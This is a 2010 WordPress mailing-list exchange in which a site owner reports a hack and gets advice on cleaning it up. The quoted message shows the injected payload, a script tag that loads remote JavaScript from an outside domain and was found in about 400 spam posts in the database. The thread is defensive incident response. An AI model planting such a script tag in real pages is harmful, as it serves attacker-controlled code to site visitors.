[wp-hackers] 3.0 site got hacked

Piyush Mishra me at piyushmishra.com
Thu Jul 22 04:21:06 UTC 2010


for the time being make a plugin for the_content and str_replace the
script to an empty string.

after tht try n solve things with your host before wasting time in
fixing things coz the attacks will come right back...

On 7/22/10, 24/7 <24-7 at gmx.net> wrote:
>> Your host seems to be having some problems:
>>
>> http://weblog.mediatemple.net/weblog/category/system-incidents/1378-i...
>
> Thanks Andrew. Hot Tip. I had already checked the users and still only
> have one user. But when looking into the db, there where about 400 new
> posts (other content titles were doubled) all containing:
>
> <script src="http://ae.awaue.com/7"></script>
>
> (If you take a look at the domain, then you can read the plain
> script). I wonder why they don't show up in the admin-UI.
>
> I still don't know how this got into my system. I'm now searching for
> a SQL-query to delete all the scripts. Pretty tired now, but maybe
> it's possible with a normal query und some update post content
> function. If someone has any idea or done this before: I'd love to
> hear from you. Thanks a lot!
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>


-- 
Regards
Piyush Mishra
http://www.piyushmishra.com/
Life's Short, Live it to the maximum


More information about the wp-hackers mailing list